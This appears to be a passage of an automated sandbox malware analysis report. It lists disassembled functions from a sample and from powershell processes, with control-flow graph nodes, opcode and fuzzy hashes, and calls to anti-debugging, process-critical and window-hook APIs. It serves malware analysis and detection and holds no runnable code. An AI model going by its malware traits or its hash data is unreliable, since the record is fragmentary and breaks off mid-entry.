7ff848f2068e-7ff848f206a3 742->752 753 7ff848f20640-7ff848f20643 742->753 743->589 750 7ff848f205b9-7ff848f205c9 call 7ff848f10620 743->750 759 7ff848f205cb-7ff848f20602 call 7ff848f1f490 750->759 760 7ff848f20607-7ff848f20624 call 7ff848f10620 call 7ff848f10628 call 7ff848f1bd30 750->760 761 7ff848f20711-7ff848f20726 752->761 762 7ff848f206a5-7ff848f2070c call 7ff848f10b10 call 7ff848f1f490 752->762 753->589 755 7ff848f20649-7ff848f20689 call 7ff848f10618 call 7ff848f10628 call 7ff848f1bd30 753->755 755->617 759->617 760->617 775 7ff848f2072c-7ff848f20846 call 7ff848f1dda8 call 7ff848f1ddb8 call 7ff848f1ddc8 call 7ff848f1ddd8 call 7ff848f1b980 call 7ff848f1dde8 call 7ff848f1ddb8 call 7ff848f1ddc8 761->775 776 7ff848f20954-7ff848f20969 761->776 762->617 824 7ff848f20848-7ff848f208ad call 7ff848f1ddf8 call 7ff848f1de08 775->824 825 7ff848f208b7-7ff848f20952 call 7ff848f10b10 call 7ff848f10630 call 7ff848f1f490 775->825 776->617 786 7ff848f2096b-7ff848f2096e 776->786 786->589 792 7ff848f20974-7ff848f209a6 786->792 792->617 824->825 825->617
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3327193206.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff848f10000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID: 0-3916222277
                                                                                • Opcode ID: 49ba4fe80ef6c75ab8058f92bd6b7ac6090e512364ffbd7672d9e77be21d0771
                                                                                • Instruction ID: 9dd2e55aa496ee98f9418df33f84df2dd777ecaa9ee61f2181dd5fac1ca4131b
                                                                                • Opcode Fuzzy Hash: 49ba4fe80ef6c75ab8058f92bd6b7ac6090e512364ffbd7672d9e77be21d0771
                                                                                • Instruction Fuzzy Hash: F3626F31B2C9198FEB98FB28845967973E2EFD9380F544578D40EC72C6DE29EC828745
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F112E9 Relevance: 2.0, Strings: 1, Instructions: 768COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 850 7ff848f112e9-7ff848f11320 852 7ff848f11d26-7ff848f11d6d 850->852 853 7ff848f11326-7ff848f114ad call 7ff848f10548 * 10 call 7ff848f10648 850->853 903 7ff848f114af-7ff848f114b6 853->903 904 7ff848f114b7-7ff848f11501 call 7ff848f104c0 call 7ff848f104b8 853->904 903->904 913 7ff848f11529-7ff848f11549 904->913 914 7ff848f11503-7ff848f11522 call 7ff848f10358 904->914 920 7ff848f1155a-7ff848f115be call 7ff848f10780 913->920 921 7ff848f1154b-7ff848f11555 call 7ff848f10368 913->921 914->913 931 7ff848f1165e-7ff848f116ec 920->931 932 7ff848f115c4-7ff848f11659 920->932 921->920 952 7ff848f116f3-7ff848f1176f call 7ff848f10e50 call 7ff848f10de8 931->952 932->952 962 7ff848f11772-7ff848f117ab call 7ff848f10378 call 7ff848f10388 952->962 969 7ff848f117ad-7ff848f117b8 962->969 970 7ff848f117d2-7ff848f117f2 962->970 969->962 972 7ff848f117ba-7ff848f117cb call 7ff848f10358 969->972 977 7ff848f11803-7ff848f11862 970->977 978 7ff848f117f4-7ff848f117fe call 7ff848f10368 970->978 972->970 985 7ff848f1188a-7ff848f118aa 977->985 986 7ff848f11864-7ff848f11883 call 7ff848f10358 977->986 978->977 992 7ff848f118bb-7ff848f1199d 985->992 993 7ff848f118ac-7ff848f118b6 call 7ff848f10368 985->993 986->985 1007 7ff848f119eb-7ff848f11a1e 992->1007 1008 7ff848f1199f-7ff848f119d2 992->1008 993->992 1019 7ff848f11a20-7ff848f11a41 1007->1019 1020 7ff848f11a43-7ff848f11a73 1007->1020 1008->1007 1015 7ff848f119d4-7ff848f119e1 1008->1015 1015->1007 1018 7ff848f119e3-7ff848f119e9 1015->1018 1018->1007 1021 7ff848f11a7b-7ff848f11ab2 1019->1021 1020->1021 1028 7ff848f11ab4-7ff848f11ad5 1021->1028 1029 7ff848f11ad7-7ff848f11b07 1021->1029 1031 7ff848f11b0f-7ff848f11b4b 1028->1031 1029->1031 1033 7ff848f11b52-7ff848f11b5d 1031->1033
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3327193206.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff848f10000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: SAO_^
                                                                                • API String ID: 0-3650529936
                                                                                • Opcode ID: a90f958fda9c070e381168e8bf634219d00502b115254e3801482457332b6bce
                                                                                • Instruction ID: c1ebe669d1a7bd18231850df25bc17b72cec9898c1be21653e1f58332660d8b0
                                                                                • Opcode Fuzzy Hash: a90f958fda9c070e381168e8bf634219d00502b115254e3801482457332b6bce
                                                                                • Instruction Fuzzy Hash: A9326134B2DA195FE798FB2884597B976E2FF98340F940579E40EC32C2DF28AC818755
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F178C1 Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1056 7ff848f178c1-7ff848f1797d CheckRemoteDebuggerPresent 1060 7ff848f1797f 1056->1060 1061 7ff848f17985-7ff848f179c8 1056->1061 1060->1061
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3327193206.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff848f10000_X1.jbxd
                                                                                Similarity
                                                                                • API ID: CheckDebuggerPresentRemote
                                                                                • String ID:
                                                                                • API String ID: 3662101638-0
                                                                                • Opcode ID: 953212888384c23dcfe727211dc76676ee0338ec311517e62916064aa7dc9585
                                                                                • Instruction ID: 21da6084ffdc62de655fab4290e5ca04c837187cf5f04468d8f0de993f15002e
                                                                                • Opcode Fuzzy Hash: 953212888384c23dcfe727211dc76676ee0338ec311517e62916064aa7dc9585
                                                                                • Instruction Fuzzy Hash: 5631DF31908B5C8FCB58DF58C88A7EA7BF0EF65321F05426AD489D7292DB34A845CB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F15F06 Relevance: .5, Instructions: 471COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3327193206.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff848f10000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1d5975956b2b0568b0a8475ff6fc8b372bc109a4b1cdcf03ed4b29169dca7cad
                                                                                • Instruction ID: e7488ab080164a3362921da52638bcd196573e216c3e3dcdcda0fb18a7bc7b5a
                                                                                • Opcode Fuzzy Hash: 1d5975956b2b0568b0a8475ff6fc8b372bc109a4b1cdcf03ed4b29169dca7cad
                                                                                • Instruction Fuzzy Hash: CAF1733090CA8D8FEBA8EF28C8557E977E1FF54350F04426EE84DC7295DB3899458B85
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F16CB2 Relevance: .5, Instructions: 457COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3327193206.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff848f10000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5fcbc037eee054457287cb092699087ed27dff3c60fa92bd575a1cbfc38cf046
                                                                                • Instruction ID: 64641da8183fb361f4a27193d237019e8913b8f3258b6b761eea271e139755cf
                                                                                • Opcode Fuzzy Hash: 5fcbc037eee054457287cb092699087ed27dff3c60fa92bd575a1cbfc38cf046
                                                                                • Instruction Fuzzy Hash: 52E1913090CA8E8FEBA8EF28C8557E977E1FB54350F04426ED84DC7295DB78A8458B85
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F121D1 Relevance: .4, Instructions: 388COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3327193206.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff848f10000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1c99d33e1ea7b8e7386bd68203dfb1342ccbdfc51c2e30c6216650b355834542
                                                                                • Instruction ID: 3c0568ddc76878b0f2a71ef24ce2f8f6068b1a305479830d48e5d3c82e2688bc
                                                                                • Opcode Fuzzy Hash: 1c99d33e1ea7b8e7386bd68203dfb1342ccbdfc51c2e30c6216650b355834542
                                                                                • Instruction Fuzzy Hash: B2C1A130F2D94A4FEB88FBA8946527976D2FF99384F440579E04EC32D2DF28AC428745
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F1AD4D Relevance: 1.6, APIs: 1, Instructions: 145COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1035 7ff848f1ad4d-7ff848f1ae30 RtlSetProcessIsCritical 1039 7ff848f1ae38-7ff848f1ae6d 1035->1039 1040 7ff848f1ae32 1035->1040 1040->1039
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3327193206.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff848f10000_X1.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalProcess
                                                                                • String ID:
                                                                                • API String ID: 2695349919-0
                                                                                • Opcode ID: bb92bf0b42263fce254f5e696a992227a3d2423b4d054fea95b60b886484c560
                                                                                • Instruction ID: 64f6db92e7f39b35526c70c018c6c2ff7e1f0f3ad0b91f774ce07a4a567b0cb8
                                                                                • Opcode Fuzzy Hash: bb92bf0b42263fce254f5e696a992227a3d2423b4d054fea95b60b886484c560
                                                                                • Instruction Fuzzy Hash: A041B63190C6588FD719DFA8D855BE9BBF0FF56311F04416EE08AC3692CB786846CB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F1B3C8 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1042 7ff848f1b3c8-7ff848f1b3cf 1043 7ff848f1b3da-7ff848f1b44d 1042->1043 1044 7ff848f1b3d1-7ff848f1b3d9 1042->1044 1048 7ff848f1b4d9-7ff848f1b4dd 1043->1048 1049 7ff848f1b453-7ff848f1b458 1043->1049 1044->1043 1050 7ff848f1b462-7ff848f1b49f SetWindowsHookExW 1048->1050 1051 7ff848f1b45f-7ff848f1b460 1049->1051 1052 7ff848f1b4a1 1050->1052 1053 7ff848f1b4a7-7ff848f1b4d8 1050->1053 1051->1050 1052->1053
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3327193206.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff848f10000_X1.jbxd
                                                                                Similarity
                                                                                • API ID: HookWindows
                                                                                • String ID:
                                                                                • API String ID: 2559412058-0
                                                                                • Opcode ID: 4e8e08f85640bca3594aebec4db08ed256799938d6d8b808734f1ff984fa9145
                                                                                • Instruction ID: ff50ae10c7b1755c46c36adc7a394c49d4711616095d8cd79a67bb8fb3c2b846
                                                                                • Opcode Fuzzy Hash: 4e8e08f85640bca3594aebec4db08ed256799938d6d8b808734f1ff984fa9145
                                                                                • Instruction Fuzzy Hash: 4541263191CA5C8FDB18EF6C98466F9BBE1EB59321F04427ED009C3292CB64A812C7C1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                Function 00007FF848F1953A Relevance: 2.3, Strings: 1, Instructions: 1041COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3327193206.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff848f10000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 8
                                                                                • API String ID: 0-4194326291
                                                                                • Opcode ID: e9aed3f27721f9065997de0e06c531533b4a8e6bbaecdad94479726ffdb46359
                                                                                • Instruction ID: a30e19d3830d0569b750d083d98c074331b0226c9b1c671d3da007ebaf1e1082
                                                                                • Opcode Fuzzy Hash: e9aed3f27721f9065997de0e06c531533b4a8e6bbaecdad94479726ffdb46359
                                                                                • Instruction Fuzzy Hash: 30727170B29A099FE748EB288899779B7E2FF98744F544579D00DD32D2DF38A8818B41
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F15A09 Relevance: .4, Instructions: 411COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3327193206.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff848f10000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: daa8525b7fc013005b9dac82685a31b9f8d2700faadf8c87d36ec292a2455c1f
                                                                                • Instruction ID: bbde69301097a377f0d45fe586abe4b62fe02fb2653fa85ceaaa92c859decef4
                                                                                • Opcode Fuzzy Hash: daa8525b7fc013005b9dac82685a31b9f8d2700faadf8c87d36ec292a2455c1f
                                                                                • Instruction Fuzzy Hash: 2AD1A63091CA8D4FEBA8EF28C8557E977E1FF59350F04426EE84DC7291CB74A9458B82
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Executed Functions

                                                                                Function 00007FF848FF6605 Relevance: 6.7, Strings: 5, Instructions: 439COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2141145267.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848ff0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (B$I$(B$I$(B$I$(B$I$(B$I
                                                                                • API String ID: 0-3685135179
                                                                                • Opcode ID: 48abb28cd118ad687f7c9b2c527083c417fa6c5659fb4f612cb3f02abd693190
                                                                                • Instruction ID: 5ccf2fb0a7665017336051caab8e05a208286471d580d162b990a8db7c654fdd
                                                                                • Opcode Fuzzy Hash: 48abb28cd118ad687f7c9b2c527083c417fa6c5659fb4f612cb3f02abd693190
                                                                                • Instruction Fuzzy Hash: C0D10E31D0EA8A5FE799AB2858155B5BBE0EF1A2A4F1801FFD50DCB0D3EE1C9805C356
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848FF4073 Relevance: 1.4, Strings: 1, Instructions: 181COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2141145267.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848ff0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 8>$I
                                                                                • API String ID: 0-3301367642
                                                                                • Opcode ID: 8edd4b66b31221791d2e333fc325485bb3ac7a759b460cca757efa34812b36d9
                                                                                • Instruction ID: 2093772ac164ea2546decbab895eab3df4e0a12c2a3d5beb5f3f9428e0c38df4
                                                                                • Opcode Fuzzy Hash: 8edd4b66b31221791d2e333fc325485bb3ac7a759b460cca757efa34812b36d9
                                                                                • Instruction Fuzzy Hash: 7451F732A0DA4A4FE79AEB2C541167577D2FF65260F5801BBD20EC72D3DF18E8058349
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848FF4370 Relevance: 1.4, Strings: 1, Instructions: 147COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2141145267.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848ff0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: p>$I
                                                                                • API String ID: 0-2590420872
                                                                                • Opcode ID: ee9febd8337120a780f2599fe50170968fa5505f9b54edacea3b580e63b9bf2a
                                                                                • Instruction ID: c66d5833b496f83386744ad542fa19d6ddee696ef37015518a87c6327ae46bd7
                                                                                • Opcode Fuzzy Hash: ee9febd8337120a780f2599fe50170968fa5505f9b54edacea3b580e63b9bf2a
                                                                                • Instruction Fuzzy Hash: 95412832E0DA894FE7A9EB2C64106B877E1EF55760F4801BBC65DC71C3EB18AC158395
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848FF40BF Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2141145267.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848ff0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 8>$I
                                                                                • API String ID: 0-3301367642
                                                                                • Opcode ID: a9bf6436f98a462412b2c5a465fb538b075d4a9a62e273b9427d282f2bf9c39f
                                                                                • Instruction ID: f60270cf8c31db9bd8dfa357f0bab316248a1efbdff6518c06e9f17f0f7be4db
                                                                                • Opcode Fuzzy Hash: a9bf6436f98a462412b2c5a465fb538b075d4a9a62e273b9427d282f2bf9c39f
                                                                                • Instruction Fuzzy Hash: DD21D032E0EA874FE7AAEB18545113466D2FF602A4F5801BAD20EC72D3DF18DC058349
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848FF43BC Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2141145267.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848ff0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: p>$I
                                                                                • API String ID: 0-2590420872
                                                                                • Opcode ID: 7ceaab993b5b026b3ac8d0bf2c6eb90d9c4d965a6a3617d49b70aa4425dbc2dd
                                                                                • Instruction ID: 3d85ef9544d8e18af1df074afb0ae3594b0a3ace855b1cdecafe131dfb0646f5
                                                                                • Opcode Fuzzy Hash: 7ceaab993b5b026b3ac8d0bf2c6eb90d9c4d965a6a3617d49b70aa4425dbc2dd
                                                                                • Instruction Fuzzy Hash: 4211C232D0E58A4FE7A9EB2894545B87BE1FF20660F5800FBC61DDB1D3DB19AC149385
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F29728 Relevance: .1, Instructions: 145COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2140616546.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848f20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 46b502c7750fc2643517fbe5d65149f280e61dc346a1dde43aaf1357b5671cc2
                                                                                • Instruction ID: 2228dfc0e92ff07b8405e9b1cb33d395a8e1312c12dcd8a608b716f50f3f9447
                                                                                • Opcode Fuzzy Hash: 46b502c7750fc2643517fbe5d65149f280e61dc346a1dde43aaf1357b5671cc2
                                                                                • Instruction Fuzzy Hash: 80412831D1CA888FDB18DF1CB8066F97BE1FB64711F00416FE04883292DB35A8568BC6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F29FF3 Relevance: .1, Instructions: 145COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2140616546.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848f20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: af35d9ac88247dbc6a766b12beb0b9d97f19e164793b26f38da75a739eb4f33d
                                                                                • Instruction ID: 7cfb129b3aba94f5431b8a2b6274a1e773b6cd2cab4e31dd9f47a80d372bb1d2
                                                                                • Opcode Fuzzy Hash: af35d9ac88247dbc6a766b12beb0b9d97f19e164793b26f38da75a739eb4f33d
                                                                                • Instruction Fuzzy Hash: 32410F77C0E9958FE755EB6CB8520E53BA0EF11BB6F0802B7D04C4E0D3EE1D68858655
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848E0E380 Relevance: .1, Instructions: 127COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2139935423.00007FF848E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E0D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848e0d000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1da8f4dca79838dae44011df64a98b2bb91e0e77ef0bca8469bdeb21a51ebe8a
                                                                                • Instruction ID: f54501312ff187400ef84dc97cdf68d4b8c37f4599fc105fbfadb0a4b0d07d8b
                                                                                • Opcode Fuzzy Hash: 1da8f4dca79838dae44011df64a98b2bb91e0e77ef0bca8469bdeb21a51ebe8a
                                                                                • Instruction Fuzzy Hash: E641E17180DBC54FE7569B2898459623FB0EF53360F1505FFD088CB1A3E629A846C792
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F2A47C Relevance: .1, Instructions: 97COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2140616546.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848f20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 920c9e4e2106d3b4fc30c238ce53e85dbc87a94bfd48fac1275c69eccd5ba711
                                                                                • Instruction ID: b6d2006c822e7ad368ae6b0b10f33bbf853a8f99958814421123454a584c8a1a
                                                                                • Opcode Fuzzy Hash: 920c9e4e2106d3b4fc30c238ce53e85dbc87a94bfd48fac1275c69eccd5ba711
                                                                                • Instruction Fuzzy Hash: D821297080C7888FE709DB689C4A6F97FA4EB53321F08415ED445D71A3DA795846CB61
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F233B5 Relevance: .0, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2140616546.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848f20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4245d3e889aec3e041d9d8f734bc47effec83d37e61caed90803d2df4b046ffc
                                                                                • Instruction ID: b81149d342438cc37704c2a90a5bc61e4b8c38b5d9d18ebcc6d248958a2491c8
                                                                                • Opcode Fuzzy Hash: 4245d3e889aec3e041d9d8f734bc47effec83d37e61caed90803d2df4b046ffc
                                                                                • Instruction Fuzzy Hash: 6A01677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC36A5DB36E892CB46
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                Function 00007FF848F28BFA Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2140616546.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848f20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: M_^6$M_^<$M_^F$M_^I$M_^J
                                                                                • API String ID: 0-1500707516
                                                                                • Opcode ID: 08bb90f686276d95e832c48d7e551bf12ce9c831127d6a1bb33194d488d218d5
                                                                                • Instruction ID: 222d844bbf94215a77f2e18ad69bec1db98ceac06232a07d42ecf6d4690642d1
                                                                                • Opcode Fuzzy Hash: 08bb90f686276d95e832c48d7e551bf12ce9c831127d6a1bb33194d488d218d5
                                                                                • Instruction Fuzzy Hash: 94215777319455EED20137ADB8005DD7390DB902BA78803B3E158CF043EE1CA08746D4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F28995 Relevance: 5.1, Strings: 4, Instructions: 134COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2140616546.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848f20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: M_^$M_^$M_^$M_^
                                                                                • API String ID: 0-1397233021
                                                                                • Opcode ID: 4a76f62f8b7df324cd436c9a77b84c3755a5f8ec441fdcb76ebd144e4febee8d
                                                                                • Instruction ID: 64c2ce831230e0f93b401b5ad18bf1cea321504c76c4cc8d36768459cfc15fe1
                                                                                • Opcode Fuzzy Hash: 4a76f62f8b7df324cd436c9a77b84c3755a5f8ec441fdcb76ebd144e4febee8d
                                                                                • Instruction Fuzzy Hash: C7419377A0DAC25FF35B973868690957F90FF52B95B8902F6C0888B0D3FE1A5C078615
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Executed Functions

                                                                                Function 00007FF848FF6484 Relevance: 6.7, Strings: 5, Instructions: 461COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2264657912.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7ff848ff0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (B$I$(B$I$(B$I$(B$I$(B$I
                                                                                • API String ID: 0-3685135179
                                                                                • Opcode ID: 6545781285dd84acabe0c7138034109019dc86ed610c329fd95f34f15b9ead37
                                                                                • Instruction ID: c27aa0d81e50c4e65b5e21c080704ad35cf05a4fb8ab2ef745183bdf847055ad
                                                                                • Opcode Fuzzy Hash: 6545781285dd84acabe0c7138034109019dc86ed610c329fd95f34f15b9ead37
                                                                                • Instruction Fuzzy Hash: 1CE12331E0EA8A5FE799AB2858545B5BBE0EF1A290F1801FFD14DC71D3EE1C9805C366
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848FF6651 Relevance: 6.6, Strings: 5, Instructions: 357COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2264657912.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
